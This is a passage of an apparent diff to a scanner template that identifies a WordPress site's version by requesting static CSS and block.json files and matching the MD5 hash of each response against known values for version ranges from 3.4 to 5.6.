5.4 - 5.4.4 + dsl: + - "(\"ca90f19f5f90739b10f7e5bb34daf8e8\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.1 + dsl: + - "(\"0981c860400ea6df276bdc7ba6ea7768\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"296cdbcc05ec6e76493b21ee95f94c45\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"dbccf2ded65bbf13ff78161a9789930d\" == md5(body))" + - method: GET 
+ path: + - "{{BaseURL}}/wp-includes/css/dist/components/style.min.css" + matchers: + - type: dsl + name: 5.0 - 5.0.2 + dsl: + - "(\"db3e76f8a41f16d9e261a66b65b233dc\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"50242e6ba592897625683280e2cc183d\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"cb6ee69248476280b7e041e28bca75e6\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"8b8c3d03d4a83aca7779e61210443cfc\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"df32fa0a51fae2f512a26cce865dff85\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"41c395e5312889d5b6281119982b9021\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.1 + dsl: + - "(\"e5f31a8068c0da0c9cc09d60e3038d32\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"9ea8e47b2542b63e79e7933135d50adb\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"af4749ef59d8f6b2c738b5ec56c8104d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/block-library/editor.min.css" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"779eb4c7814b3e82228e77306d7537bd\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.0.11 + dsl: + - "(\"d6824fcfdbd1dd2cae2ecd53818838da\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.1 + dsl: + - "(\"a7e48e59fa5aec35ff1446a3e12c33e7\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"cb2cd4c20d793c93e10f59dcddf70f30\" == md5(body))" + - type: dsl + name: 5.1.2 - 5.1.8 + dsl: + - "(\"adf9cddda7c0c97d8a188b3506355be4\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.3 + dsl: + - "(\"3e71e641d1fca36fe6b0169145d9d10e\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"23fb73a8d74154cb905fe8b69c437c65\" == md5(body))" + - type: dsl + name: 5.3.4 - 5.3.6 + dsl: + - "(\"f65c797ff4bdc97a61590c4106b43a52\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.1 + dsl: + - "(\"45c2303a86c0b0cc5aa90af55f7100db\" == md5(body))" + - type: dsl + name: 
5.5.2 - 5.5.3 + dsl: + - "(\"a080a4d6eed93194ba7be0beb8d99945\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"ba7d6f34c9eeef4579940d4a4dc03ff3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/block-library/editor-rtl.min.css" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"7f4b34c7ab664222bae7d3561c41068c\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.0.11 + dsl: + - "(\"6e977885a56d7fb205284b679d545717\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.1 + dsl: + - "(\"ebc57eca1ff3628452d09629ce51047a\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"c29329e44d6e8bdd19c6ef3e2ce5bd9a\" == md5(body))" + - type: dsl + name: 5.1.2 - 5.1.8 + dsl: + - "(\"81825ed3f80e128dcef13220deff02b9\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.3 + dsl: + - "(\"d703f2178551d235ce107c8b7f5e5e61\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"79c315d92ea0fd866722db3618ef50d3\" == md5(body))" + - type: dsl + name: 5.3.4 - 5.3.6 + dsl: + - "(\"cfe89277798e51f685aafac401edfe72\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.1 + dsl: + - "(\"1d563107274d6f3d954b8071d0a55a45\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"6cf2fbd6cfe5a53b5c22433e0fdf7f33\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"2870907da358f5e21bf0e3f1875074c0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/html/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"0b39e466dcab40ea8f304d042ce179ec\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"3798eb8f3d92dd791dd24700c2271959\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/column/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"f4d6c66d01690e0fce9bb2d23c720769\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"621627beadf310b9b990a5e345f634ee\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-includes/blocks/separator/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"aabe1dda90559a88e3874f809c6b302b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"907c5bdfeffab73a8c024f060a5db2c1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/classic/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"adee64873f7bb0d68f446ccf49db0b71\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"8c9a109c2571beec1b1cd39e53f2eea0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/more/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"e32e6a6c2f9cb966729c317d2aad9785\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"1b1cdbe8af4f0d583a377f8659a77f60\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/archives/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"32823791a845af271ff8c3fcd35e5c9c\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"5a445473f9b5e1a4e1ed33df97f11434\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/list/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"4283f9b36dcf7670502d3989fdca8715\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"d37bdde94db55890c60cbddfcd7a63e7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/latest-comments/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"b8d732e95d6635b79ae28481748bbcb8\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"9d6d2762ad00fe9e3021a27112643de3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/categories/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"6c289cf6ab5f8552752ddf00b5489bb1\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"4c97ec7175e2af6a59eb15f3e319f23e\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-includes/blocks/text-columns/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"59e2a5f827be60dbba2d2380480ae524\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"b92afdee7ec920a842e2be0d12ce2499\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/spacer/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"909f07a23f82a1d7d47bffd91ddd0f65\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"9b39f563b5c3a308ca9b1a826d2c6e46\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/nextpage/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"9b715eaeb2ced0c57cf4e3c386fb2d1e\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"e51d57b68dbcab3751b0ad292ac4c8fb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/pullquote/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"b839b85457fe74c1b9d6f166a152dfd5\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"ed9a40823cbcd20da93cbab5a21e279a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/subhead/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"41a3f35bbe43fa1af83e58f9bf158ceb\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"a863d67a878fba1f866c8bc05197bd86\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/table/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"c4fe6d72ffb2f1278ba622d364052076\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"6a123d969e677f1bd05d4af3223a6834\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/rss/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"23694f35af5267032e9d4548cff976e8\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"3583b062ddcda7b24a3976fd4f195513\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-includes/blocks/columns/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"41ab9bd1a6771c071e54bbe659134266\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"55af73e6756fd7463dbfe80db51e501c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/button/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"c7afe532f1dd6306dc9b0902a90d7812\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"be97ad5ccacf2742dad5b50a2d67b5b2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/heading/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"d5922b3f79c5c2b67db0ec2517ce073d\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"86ffc61cd4d57f61b89df17000eb69ab\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/social-links/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"10a3aed698839aa91f245b0c001ee2ea\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"3e284b35d1950853bba5e966b249fcaf\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/group/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"d3be4e6b16625cdf0c8528a3cef7dc54\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"a7e88fca718b97a35a8dd4597b19e805\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/media-text/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"c92d0c96d3c577711c04aeafde2ec3f6\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"cbf874d7ffa569e49811820fbc9f97df\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/block/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"e8e49e3c9c93d5a42814e75162daf324\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"3a4de2dda586eb9d1a97e5ca9165052b\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-includes/blocks/buttons/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"5bc68f8f8a590862671b1a9943def5f3\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"2bccd4df2e0027b1605f32cf6b109e5d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/paragraph/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"5efcb514b695d4e1c0403e2e3b1d266f\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"28991e3ae8bababa834bbdf0a08519d9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/missing/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"237a65525f167fb21c105ad80861d3b7\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"ba2412b859d4ba22394eca145274d566\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/quote/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"7964f7c327c1c6edb0628767693cfe2d\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"9e98dac0f8ea0a0029e0e5a0bd31d495\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/calendar/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"19f82b9ca4c05c0f6b4c33564dce5d32\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"b66a05d7ebbb15387348a33c721f9b3a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/image/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"9cc125bbd91c86051a74b19c602d09f9\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"651f818043ebd9b2a36002c77aa4099e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/tag-cloud/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"75f4f8b4009e14fc323e6942f9571de9\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"052287ea36440570123519d03c728202\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-includes/blocks/audio/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"10a618237f615b92ca220a4616050d7b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"a8853b818eea4a56f68ce738e1cd2b20\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/latest-posts/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"130991aa9a24862eecb4cc74a3dde76b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"655ec3498b3fd3eef512a4773e5e1655\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/video/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"0e547adddb611126e305babce207a0ea\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"e204095892b1ed43e0db7ec6f041d441\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/verse/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"efc6b180800772fc581603adca739b87\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"2cf2a27cb66ace196738b54da11ba85b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/code/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"db474f9685478365ba812657769bba9a\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"5f9688205db939b5a47e136eddc7ad55\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/file/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"1ef23efdda9cecde00ebe785e98482ba\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"f7c0056bf419ca380fcfec88dc8e5831\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/gallery/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"e30565787c3717bf735162d344bc5c70\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"3f3774e67c95d12408d1b1bd1196ad01\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-includes/blocks/search/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"b56b4486e42ff65eea9b1a2d304f6c48\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"5396d05f685b6aa5d2153734be2a17f7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/preformatted/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"535fe1ff4cb39ac5a6f5a4112c32519e\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"b3820f941e2ff1b686af5f9a7d369cc5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/wp-auth-check-rtl.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"3c6435cd046cb20503989540df6bb299\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"b1e98d74916d7911bcc284eab254e2cb\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.3 + dsl: + - "(\"5bbe4c2ecb541952ca408683e79fbb14\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"f8fa4bcad00bddea5fc40dc4701ada1a\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"f25622d7920e308f35585f91572ac755\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"476e2bbfe969e737181ae9cfe762ef24\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"4d6ca4acefd6ee3f4c49019bdc19ef48\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"1f55126b05501747659d2db0df9f8334\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"7496cd0ac9641aebc1bad0b7a4d3e7f8\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"221cc5e1242083531de5c2216954fa50\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"aebfde61667894a8e13fec6e3485bdeb\" == md5(body))" + - type: dsl + name: 5.0 - 5.2.9 + dsl: + - "(\"ff073acb3f9177edfdcd35dfcd63fd71\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"095feb4ad3dc9c26670120c0f29dac10\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - 
"(\"d4595757af421829b1524064511718ee\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"66f665a8de6a6f123b28cefae46557eb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/wp-auth-check.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"075a4ec4f5c24b7af6f879983f00e477\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"e888776b29d7888acda2e33b4131d3fa\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.3 + dsl: + - "(\"d1f94f9a93f83b7dc4d924f04842d294\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"b26b83796f3aa0f932585cce3925be33\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"82e0a49003600469a595f3362d318f2c\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"eb60fd346a4039fdcf5912fce6dd1ad1\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"9ed9dabd94f3a18eb8574dc2bd394ed2\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"a37b3bb02583097a4a502df1d7e5cb25\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"08ccdd663a722b4551a3e7ff24b510a6\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"32a98483f9e4f78c17548372b940002a\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"13e3438edb73cd886466b480efde70b7\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"b7cbb99a4dcb90b4b6014ebd3c706226\" == md5(body))" + - type: dsl + name: 5.0 - 5.2.9 + dsl: + - "(\"a25e23b0eceedaebe5046299e1b2b7a2\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"db371a9bb3c8050843197400f68ba9df\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"aa04fc708866d04dbd758e16ac9293c1\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"a8dcad07317fa0500b76284fd890dee8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/jquery-ui-dialog.min.css" + matchers: + - type: dsl + name: 4.5 - 4.8.15 + dsl: + - 
"(\"dae18845cfc3c211c5c6de92401b2ad5\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"dff3dd1a74dba4b1f43eb186e66527fc\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"726d1f1796a539919fd0406404dd24e2\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"e00e1d287de9b4f665427b781153090b\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"6e6ae4efeeb4b153955047d63d1f9703\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"38498f539f05402b45802133dc18badd\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"df0a7de26cc6d44c0efd784d78181ad3\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"ecacb2abac2365119b6e02320360f502\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"aa0b126055663de33e6bf670b002c635\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"438f7bb958e6bfdb80110ee0efcada79\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"a1fd22821b6c7702e7342b9b58db49e3\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"7689c288d2a1039dfca195ebb1cbe01a\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"b8a2e9ca1829d1a2f78c21cad088648b\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"52df0ee7031b6591ad05d0175c162761\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"1ee52c1421996228205da31d46d967c3\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"b58173c40720794761eb3c00fd8dd845\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"1f73ae24f66e26b2bb191712b427045d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/jquery-ui-dialog-rtl.min.css" + matchers: + - type: dsl + name: 4.5 - 4.8.15 + dsl: + - "(\"de1c2e841d52991cc738f4b029a4f249\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"ee2dad2b1125172ff11ab1ba0da58055\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - 
"(\"5b2c5aa1462672e6856632e1901ece55\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"3269187936a176a98efc265d8332c5e4\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"37f26aba16eb341b2b1a6e36e5783e7b\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"cb15ea6714abe8a9e96aa3fddaecbfee\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"3e2b2a932eab3ec981a1e511255c36b8\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"db6497f0a0342cc1045689e4ac0c0135\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"ce85a25b6c4c9c30611b6ffc0ec63c31\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"0d69bfe5e1fbf61a192084e6f5acd344\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"96a40386dd22398a9609ffa031e3522d\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"d438f2be1ff29ca5faf2b3c05924df44\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"e77573da19e0ae9e9a18865f6d7c5dca\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"33165e1b75e4cb6d47fdb2202060b684\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/revisions-rtl.min.css" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"0114c79d89d3e0edd14d711c868d4fd7\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"111e2567c39c778be470f37b5ad9952b\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"48a1c7be34fe93a11b1652b2ee8d4a4e\" == md5(body))" + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"8386d6dcf5ce18b47f790acecbd3dd97\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"ecce9ac8713cbff2e3c02b5e74754514\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"aa4b9f80af7993692411777d66e9d2de\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"3689b569f5d0d9eaed70ccfff0394634\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - 
"(\"d1d73d17347055579633e891c06b9efb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/revisions.min.css" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"7db5304ec20677c46bbcbd7b9e9fa350\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"95cf37a45ba51f7acea2600ab04e2050\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"648a668518ad84c937e3370599b079ba\" == md5(body))" + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"f1a70d5db540011fd1dea2d1d4d681d7\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"375d030732f7adf73ada1738d831cffc\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"040c4477b10c9fcf3cffb761dcb0e50f\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"262319e7380fad735c0992d75f8dcdb2\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"ff98e598cfe1516be02f2e4c18b1b834\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/jquery-ui-dialog.css" + matchers: + - type: dsl + name: 4.5 - 4.8.15 + dsl: + - "(\"a0347ba6476ac6b646d145697970e81c\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"8cadbf2aa4edbb8f4c4a70b2c81df4dc\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"0a1016dec8649f08c0f31bbb5c36cd01\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"a6f2b4869450341fd4a85de9e9f1c3d5\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"9ab71d9bdcdc1a83b5314eb96196235a\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"9b76925214a2d6be0836586daa7695af\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"188204f30b17861ace764b0e25e1bdec\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"2725a817d111107de5ee243229f741dc\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"af42a609ba502539031241366138e152\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"22e853bc14fe2ff1360a2f371fbc5c08\" 
